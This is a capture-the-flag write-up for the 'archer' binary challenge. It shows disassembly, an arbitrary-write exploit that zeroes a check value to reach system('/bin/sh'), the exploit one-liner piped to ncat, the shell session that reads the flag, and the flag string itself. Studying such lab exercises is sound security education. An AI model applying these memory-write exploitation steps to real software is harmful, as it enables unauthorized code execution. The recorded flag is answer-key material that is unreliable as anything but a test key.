It's battle time! We're giving you one shot, one kill - choose wisely.
- File : archer
The binary ask us to send an arrow to win a battle,\ the goal is to spawn a shell by not verifying this conditional jump @0x0040123b
│ 0x0040122e 488b05332e00. mov rax, qword [obj.code] ; [0x404068:8]=0x13371337 ; "7\x137\x13"
│ 0x00401235 483d37133713 cmp rax, 0x13371337
│ ┌─< 0x0040123b 750a jne 0x401247
│ │ 0x0040123d bf00000000 mov edi, 0
│ │ 0x00401242 e849feffff call sym.imp.exit
│ │ ; CODE XREF from main @ 0x40123b
│ └─> 0x00401247 488d3d6b0e00. lea rdi, str.WE_WON_ ; 0x4020b9 ; "WE WON!"
│ 0x0040124e e8ddfdffff call sym.imp.puts
│ 0x00401253 488b05162e00. mov rax, qword [obj.stdout] ; obj.__TMC_END__
│ ; [0x404070:8]=0
│ 0x0040125a 4889c7 mov rdi, rax
│ 0x0040125d e80efeffff call sym.imp.fflush
│ 0x00401262 488d3d580e00. lea rdi, str._bin_sh ; 0x4020c1 ; "/bin/sh"
│ 0x00401269 e8d2fdffff call sym.imp.system
│ 0x0040126e b800000000 mov eax, 0
│ 0x00401273 c9 leave
└ 0x00401274 c3 ret
before that it asks us to give him a target, here a memory address :
┌ 111: sym.makeshot ();
│ ; var int64_t var_8h @ rbp-0x8
│ 0x00401275 55 push rbp
│ 0x00401276 4889e5 mov rbp, rsp
│ 0x00401279 4883ec10 sub rsp, 0x10
│ 0x0040127d 488d3d450e00. lea rdi, str.Heres_your_arrow_ ; 0x4020c9 ; "Here's your arrow!"
│ 0x00401284 e8a7fdffff call sym.imp.puts
│ 0x00401289 488d3d500e00. lea rdi, str.Now__which_soldier_do_you_wish_to_shoot_ ; 0x4020e0 ; "Now, which soldier do you wish to shoot?"
│ 0x00401290 e89bfdffff call sym.imp.puts
│ 0x00401295 488b05d42d00. mov rax, qword [obj.stdout] ; obj.__TMC_END__
│ ; [0x404070:8]=0
│ 0x0040129c 4889c7 mov rdi, rax
│ 0x0040129f e8ccfdffff call sym.imp.fflush
│ 0x004012a4 488d45f8 lea rax, [var_8h]
│ 0x004012a8 4889c6 mov rsi, rax
│ 0x004012ab 488d3d570e00. lea rdi, [0x00402109] ; "%p"
│ 0x004012b2 b800000000 mov eax, 0
│ 0x004012b7 e8c4fdffff call sym.imp.__isoc99_scanf
│ 0x004012bc 488b45f8 mov rax, qword [var_8h]
│ 0x004012c0 480500005000 add rax, 0x500000
│ 0x004012c6 488945f8 mov qword [var_8h], rax
│ 0x004012ca 488b45f8 mov rax, qword [var_8h]
│ 0x004012ce 48c700000000. mov qword [rax], 0
│ 0x004012d5 488d3d300e00. lea rdi, str.Shot_ ; 0x40210c ; "Shot!"
│ 0x004012dc e84ffdffff call sym.imp.puts
│ 0x004012e1 90 nop
│ 0x004012e2 c9 leave
└ 0x004012e3 c3 ret
In this function a null byte is placed at the address +0x500000 you type via scanf\ The solution is to give the memory address of 0x13371337 @0x404068 minus 0x500000
$ ( echo yes ; python -c "print(hex(0x404068-0x500000))" ; cat ) | ncat 43092
It's battle day archer! Have you got what it takes?
Answer [yes/no]: Awesome! Make your shot.
Here's your arrow!
Now, which soldier do you wish to shoot?
Hope you shot well! This will decide the battle.
cat flag_0a52f21b1a.txt
flag : rarctf{sw33t_sh0t!_1nt3g3r_0v3rfl0w_r0cks!_170b2820c9}